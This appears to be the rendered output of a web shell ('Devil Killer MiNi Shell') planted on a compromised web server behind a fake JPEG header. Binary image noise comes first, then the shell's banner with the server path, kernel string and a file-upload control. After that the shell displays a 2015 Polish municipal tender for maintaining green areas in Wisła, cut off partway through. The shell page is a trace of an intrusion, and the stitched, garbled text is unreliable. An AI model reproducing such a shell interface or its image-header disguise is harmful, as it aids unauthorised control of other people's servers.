JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150313/56096-N-2015.html

<p class="kh_header"><b>Wisła: Utrzymanie terenów zielonych na obszarze miasta Wisły w  roku 2015</b><br>
<b>Numer ogłoszenia: 56096 - 2015; data zamieszczenia: 13.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wisła , Plac Bogumiła Hoffa 3, 43-460 Wisła, woj. śląskie, tel. 033 855-24-25, faks 033 855-29-95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.wisla.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie terenów zielonych na obszarze miasta Wisły w  roku 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres rzeczowy zamówienia obejmuje  utrzymanie terenów zielonych na terenie miasta Wisły  i zostało podzielone na trzy części:
3.1.Część nr 1 - zakres I obejmuje:
1. jesienne grabienie liści z trawników, skupin, alejek, dróg parkowych i innych wskazanych miejsc (w tym: zbieranie gałęzi, rozgarnianie kretowisk) wraz z wywozem zagrabionych materiałów - powierzchnia około 20 624 m2
2. koszenie trawnika (w tym: grabienie i wywóz skoszonej trawy) - zgodnie z wykazem w Tabeli nr 1 - ok. 15 razy w roku
3. nawadnianie trawnika w zależności od warunków pogodowych (przed szkołą)
4. pielęgnacja krzewów liściastych (rododendron) - plewienie, nawożenie, oraz w okresie jesiennym zabezpieczenie krzewów przed śniegiem
5. pielęgnacja 70 skrzyń z iglakami (nawożenie, cięcia, podlewanie, utrzymanie w czystości donic, ochrona roślin przed szkodnikami i chorobami)
6. utrzymanie i pielęgnacja rabat (podlewanie roślin - w zależności od warunków pogodowych, bieżące usuwanie pojawiających się chwastów, wiosenne przycinanie, nawożenie, usuwanie przekwitłych kwiatów, usunięcie roślin po ich wegetacji, wywóz chwastów, ochrona roślin przed szkodnikami i chorobami) ok. 820 m2 - zgodnie z wykazem w Tabeli nr 2 SIWZ 5.I.
7. utrzymanie i pielęgnacja kwiatów w 2 wieżach kwiatowych H2000 (podlewanie roślin, nawożenie kwiatów, usuwanie przekwitłych kwiatostanów, ochrona roślin przed szkodnikami i chorobami)
8. utrzymanie i pielęgnacja kwiatów w 3 wieżach kwiatowych H1100 (podlewanie roślin, nawożenie kwiatów, usuwanie przekwitłych kwiatostanów, ochrona roślin przed szkodnikami i chorobami)
9. pielęgnacja i utrzymanie kwietników wiszących (46szt.) - bieżące usuwanie pojawiających się chwastów, podlewanie (w zależności od warunków pogodowych), nawożenie, usuwanie przekwitłych kwiatów, usunięcie roślin po ich wegetacji, wywóz chwastów i usuniętych roślin oraz ich części, ochrona przed szkodnikami
10. pielęgnacja żywopłotów (formowanie, obcinanie, odchwaszczanie żywopłotów, zgrabienie odciętych pędów, odchwaszczanie powierzchni wokół żywopłotów) - ok. 2 700 m2
11. utrzymanie rabaty - krokusy (pielęgnacja kwiatów po okresie wiosennym - po zakwitnięciu, ochrona roślin przed szkodnikami i chorobami, usuwanie chwastów, przykrycie kwiatów na okres zimowy)
12. Wykonanie obsady w rabatach kwiatowych (wykonanie obsady wiosennej, spulchnianie gleby, obsada kwiatami ~18szt/m2) ok. 740 m2 - zgodnie z wykazem w Tabeli nr 3
13. wykonanie obsady w rabatach kwiatowych (wykonanie obsady letniej, spulchnianie gleby, obsada kwiatami ~18szt/m2) ok. 740 m2 - zgodnie z wykazem w Tabeli nr 3
14. pielęgnacja krzewów liściastych i iglastych: formowanie (m.in. dekoracyjnych form) i cięcia krzewów, odchwaszczanie powierzchni wokół krzewów - zebranie odciętych pędów i ich wywóz, uzupełnienie powierzchni korą (ok. 150 szt.)
15. pielęgnacja drzew: usunięcie suchych gałęzi, cięcia sanitarne - zebranie odciętych gałęzi i ich wywóz - ok. 100 szt.
16. utrzymanie ścieżek i chodników w parku i koło amfiteatru - grabienie z liści i zanieczyszczeń, niszczenie mchu chwastów, wywóz materiałów - ok. 5 590 m2
17. dosiewanie lub darniowanie zniszczonych miejsc w trawnikach ok. 100 m2
3.2. Część nr 2 obejmuje:Utrzymanie terenów zielonych na terenie miasta Wisły w roku 2015- zakres II
1. mechaniczne koszenie trawników (zgodnie z wykazem w Tabeli nr 1) wraz z rozgarnianiem kretowisk oraz grabieniem i wywozem skoszonej trawy. W zależności od warunków atmosferycznych średnio 15 razy w sezonie wegetacyjnym przy założeniu, że wysokość skoszonej trawy nie może przekraczać 5-7 cm - powierzchnia około 14 390 m2
2. jesienne grabienie liści z trawników, skupin, alejek, dróg parkowych i innych wskazanych miejsc (w tym: zbieranie gałęzi, rozgarnianie kretowisk) wraz z wywozem zagrabionych materiałów - powierzchnia około 14 390 m2
3. formowanie, obcinanie i odchwaszczanie żywopłotów, zgrabienie odciętych pędów, odchwaszczanie powierzchni wokół żywopłotów (Oaza) - ok. 270 m2
4. pielęgnacja krzewów liściastych i iglastych: formowanie (m.in. dekoracyjnych form) i cięcia krzewów, odchwaszczanie powierzchni wokół krzewów - zebranie odciętych pędów i ich wywóz, uzupełnienie powierzchni korą (ok. 20 szt.)
5. pielęgnacja drzew: usunięcie suchych gałęzi, cięcia sanitarne - zebranie odciętych gałęzi i ich wywóz - ok. 20 szt.
6. utrzymanie ścieżek i chodników w parku, koło ślązaczki, oczka wodnego, amfiteatru i na Oazie - grabienie z liści i zanieczyszczeń, niszczenie mchu chwastów, wywóz materiałów - ok. 1000 m2
7. dosiewanie lub darniowanie zniszczonych miejsc w trawnikach ok. 100 m2
8. utrzymanie i pielęgnacja rabat (podlewanie roślin - w zależności od warunków pogodowych, bieżące usuwanie pojawiających się chwastów, wiosenne przycinanie, nawożenie, usuwanie przekwitłych kwiatów, usunięcie roślin po ich wegetacji, wywóz chwastów, ochrona roślin przed szkodnikami i chorobami) ok. 601 m2 - zgodnie z wykazem w Tabeli nr 2 SIWZ 5.II.
9. Wykonanie obsady w rabatach kwiatowych (wykonanie obsady wiosennej, spulchnianie gleby, obsada kwiatami ~18szt/m2) ok. 150 m2 - zgodnie z wykazem w Tabeli nr 3 SIWZ 5.II.
10. wykonanie obsady w rabatach kwiatowych (wykonanie obsady letniej, spulchnianie gleby, obsada kwiatami ~18szt/m2) ok. 150 m2 - zgodnie z wykazem w Tabeli nr 3
11. uzupełnienie iglaków w rabatach kwiatowych ok. 216 m2
12. przygotowanie podłoża pod nasadzenia oraz obsada rabat kwiatowych ok. 235 m2 - zgodnie z wykazem w Tabeli nr 4 SIWZ 5.II.
13. utrzymanie i pielęgnacja kwiatów w 3 donicach (bieżące usuwanie pojawiających się chwastów, podlewanie (w zależności od warunków pogodowych), nawożenie, usuwanie przekwitłych kwiatów, usunięcie roślin po ich wegetacji, wywóz chwastów i usuniętych roślin oraz ich części, ochrona przed szkodnikami i chorobami) wymiary donic: wys. 60cm, śred. 78cm)
14. utrzymanie i pielęgnacja ronda (plewienie, usuwanie zanieczyszczeń, wiosenne przycinanie i formowanie krzewów) ok. 160 m2
15. pielęgnacja oczka wodnego wraz z terenem przyległym- wymiana wody (3x) wraz z czyszczeniem kamienia, (powierzchnia lustra wody wynosi ok. 208 m2)
3.3. Część nr 3 obejmuje: Utrzymanie terenów zielonych na terenie miasta Wisły w roku 2015 - zakres III.
1.mechaniczne koszenie trawników (zgodnie z wykazem w Tabeli nr 1 SIWZ 5.III) oraz koszenie poboczy i nieużytków + rozgarnianie kretowisk+ grabienie i wywóz skoszonej trawy+ w tym wycinka krzaków i samosiewów, przycinanie gałęzi. W zależności od warunków atmosferycznych średnio 10 razy w sezonie wegetacyjnym przy założeniu, że wysokość skoszonej trawy nie może przekraczać 5-7 cm. Powierzchnia ok. 49.360m2.
2.jesienne grabienie liści z trawników, skupin, alejek, ( w tym: zbieranie gałęzi, rozgarnianie kretowisk) wraz z wywozem zagrabionych materiałów (zgodnie z wykazem w Tabeli nr 2 SIWZ 5.III). Powierzchnia ok 28.760m2.
3.Utrzymanie ścieżek i chodników w Skate Parku- grabienie liści i zanieczyszczeń, niszczenie mchu i chwastów, wywóz materiałów. Powierzchnia ok. 500m2.
Zamawiający zastrzega iz Oferent może złożyć ofertę na maksymalnie dwie części Zamówienia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający nie wyklucza zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy. Będą one obejmowały świadczenie usług w większych ilościach bądź w przypadku konieczności kontynuowanie usługi w terminach późniejszych niż wskazane w umowie.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.30.00-7, 77.31.41.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający nie żąda wniesienia wadium przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.w przypadku złożenia oferty na część pierwszą  lub drugą zamówienia-  wykonali co najmniej dwie usługi o charakterze podobnym do przedmiotu zamówienia (pielęgnacja rabat kwitnących i kwiatów doniczkowych, pielęgnacja krzewów liściastych, iglastych i drzew) a wartość tych dwóch usług łącznie nie może być mniejsza niż 50.000,00PLN brutto.
1.2.W przypadku złożenia oferty na część trzecią zamówienia - wykonali co najmniej   trzy  usługi o charakterze podobnym do przedmiotu zamówienia (koszenie trawników, poboczy, nieużytków) a wartość  tych trzech zamówień łącznie nie może być mniejsza niż 30.000,00PLN brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w przypadku złożenia oferty na część pierwszą lub drugą zamówienia - dysponują co najmniej 1 osobą przeszkoloną w zakresie pielęgnacji terenów zielonych i chirurgii drzew (i drzew ozdobnych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Czas reakcji na interwencję telefoniczną wykonania każdej z usług będącej przedmiotem zamówienia - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zamiany postanowień umowy zawarto w rozdziale XVI SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://um.wisla.pl/SIWZ/2015zielen2015/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 43-460 Wisła, Plac Hoffa 3, pokój 207.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2015 godzina 10:00, miejsce: Urząd Miejski Wisła, Plac Hoffa 3, biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie terenów zielonych na terenie miasta Wisły w roku 2015- zakres I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. jesienne grabienie liści z trawników, skupin, alejek, dróg parkowych i innych wskazanych miejsc (w tym: zbieranie gałęzi, rozgarnianie kretowisk) wraz z wywozem zagrabionych materiałów - powierzchnia około 20 624 m2
2. koszenie trawnika (w tym: grabienie i wywóz skoszonej trawy) - zgodnie z wykazem w Tabeli nr 1 - ok. 15 razy w roku
3. nawadnianie trawnika w zależności od warunków pogodowych (przed szkołą)
4. pielęgnacja krzewów liściastych (rododendron) - plewienie, nawożenie, oraz w okresie jesiennym zabezpieczenie krzewów przed śniegiem
5. pielęgnacja 70 skrzyń z iglakami (nawożenie, cięcia, podlewanie, utrzymanie w czystości donic, ochrona roślin przed szkodnikami i chorobami)
6. utrzymanie i pielęgnacja rabat (podlewanie roślin - w zależności od warunków pogodowych, bieżące usuwanie pojawiających się chwastów, wiosenne przycinanie, nawożenie, usuwanie przekwitłych kwiatów, usunięcie roślin po ich wegetacji, wywóz chwastów, ochrona roślin przed szkodnikami i chorobami) ok. 820 m2 - zgodnie z wykazem w Tabeli nr 2 SIWZ 5.I.
7. utrzymanie i pielęgnacja kwiatów w 2 wieżach kwiatowych H2000 (podlewanie roślin, nawożenie kwiatów, usuwanie przekwitłych kwiatostanów, ochrona roślin przed szkodnikami i chorobami)
8. utrzymanie i pielęgnacja kwiatów w 3 wieżach kwiatowych H1100 (podlewanie roślin, nawożenie kwiatów, usuwanie przekwitłych kwiatostanów, ochrona roślin przed szkodnikami i chorobami)
9. pielęgnacja i utrzymanie kwietników wiszących (46szt.) - bieżące usuwanie pojawiających się chwastów, podlewanie (w zależności od warunków pogodowych), nawożenie, usuwanie przekwitłych kwiatów, usunięcie roślin po ich wegetacji, wywóz chwastów i usuniętych roślin oraz ich części, ochrona przed szkodnikami
10. pielęgnacja żywopłotów (formowanie, obcinanie, odchwaszczanie żywopłotów, zgrabienie odciętych pędów, odchwaszczanie powierzchni wokół żywopłotów) - ok. 2 700 m2
11. utrzymanie rabaty - krokusy (pielęgnacja kwiatów po okresie wiosennym - po zakwitnięciu, ochrona roślin przed szkodnikami i chorobami, usuwanie chwastów, przykrycie kwiatów na okres zimowy)
12. Wykonanie obsady w rabatach kwiatowych (wykonanie obsady wiosennej, spulchnianie gleby, obsada kwiatami ~18szt/m2) ok. 740 m2 - zgodnie z wykazem w Tabeli nr 3
13. wykonanie obsady w rabatach kwiatowych (wykonanie obsady letniej, spulchnianie gleby, obsada kwiatami ~18szt/m2) ok. 740 m2 - zgodnie z wykazem w Tabeli nr 3
14. pielęgnacja krzewów liściastych i iglastych: formowanie (m.in. dekoracyjnych form) i cięcia krzewów, odchwaszczanie powierzchni wokół krzewów - zebranie odciętych pędów i ich wywóz, uzupełnienie powierzchni korą (ok. 150 szt.)
15. pielęgnacja drzew: usunięcie suchych gałęzi, cięcia sanitarne - zebranie odciętych gałęzi i ich wywóz - ok. 100 szt.
16. utrzymanie ścieżek i chodników w parku i koło amfiteatru - grabienie z liści i zanieczyszczeń, niszczenie mchu chwastów, wywóz materiałów - ok. 5 590 m2
17. dosiewanie lub darniowanie zniszczonych miejsc w trawnikach ok. 100 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.30.00-7, 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Czas reakcji na interwencję telefoniczną wykonania każdej z usług będących w zakresie przedmiotu umowy - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie terenów zielonych na terenie miasta Wisły w roku 2015  zakres II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.Część nr 2 obejmuje:Utrzymanie terenów zielonych na terenie miasta Wisły w roku 2015- zakres II
1. mechaniczne koszenie trawników (zgodnie z wykazem w Tabeli nr 1) wraz z rozgarnianiem kretowisk oraz grabieniem i wywozem skoszonej trawy. W zależności od warunków atmosferycznych średnio 15 razy w sezonie wegetacyjnym przy założeniu, że wysokość skoszonej trawy nie może przekraczać 5-7 cm - powierzchnia około 14 390 m2
2. jesienne grabienie liści z trawników, skupin, alejek, dróg parkowych i innych wskazanych miejsc (w tym: zbieranie gałęzi, rozgarnianie kretowisk) wraz z wywozem zagrabionych materiałów - powierzchnia około 14 390 m2
3. formowanie, obcinanie i odchwaszczanie żywopłotów, zgrabienie odciętych pędów, odchwaszczanie powierzchni wokół żywopłotów (Oaza) - ok. 270 m2
4. pielęgnacja krzewów liściastych i iglastych: formowanie (m.in. dekoracyjnych form) i cięcia krzewów, odchwaszczanie powierzchni wokół krzewów - zebranie odciętych pędów i ich wywóz, uzupełnienie powierzchni korą (ok. 20 szt.)
5. pielęgnacja drzew: usunięcie suchych gałęzi, cięcia sanitarne - zebranie odciętych gałęzi i ich wywóz - ok. 20 szt.
6. utrzymanie ścieżek i chodników w parku, koło ślązaczki, oczka wodnego, amfiteatru i na Oazie - grabienie z liści i zanieczyszczeń, niszczenie mchu chwastów, wywóz materiałów - ok. 1000 m2
7. dosiewanie lub darniowanie zniszczonych miejsc w trawnikach ok. 100 m2
8. utrzymanie i pielęgnacja rabat (podlewanie roślin - w zależności od warunków pogodowych, bieżące usuwanie pojawiających się chwastów, wiosenne przycinanie, nawożenie, usuwanie przekwitłych kwiatów, usunięcie roślin po ich wegetacji, wywóz chwastów, ochrona roślin przed szkodnikami i chorobami) ok. 601 m2 - zgodnie z wykazem w Tabeli nr 2 SIWZ 5.II.
9. Wykonanie obsady w rabatach kwiatowych (wykonanie obsady wiosennej, spulchnianie gleby, obsada kwiatami ~18szt/m2) ok. 150 m2 - zgodnie z wykazem w Tabeli nr 3 SIWZ 5.II.
10. wykonanie obsady w rabatach kwiatowych (wykonanie obsady letniej, spulchnianie gleby, obsada kwiatami ~18szt/m2) ok. 150 m2 - zgodnie z wykazem w Tabeli nr 3
11. uzupełnienie iglaków w rabatach kwiatowych ok. 216 m2
12. przygotowanie podłoża pod nasadzenia oraz obsada rabat kwiatowych ok. 235 m2 - zgodnie z wykazem w Tabeli nr 4 SIWZ 5.II.
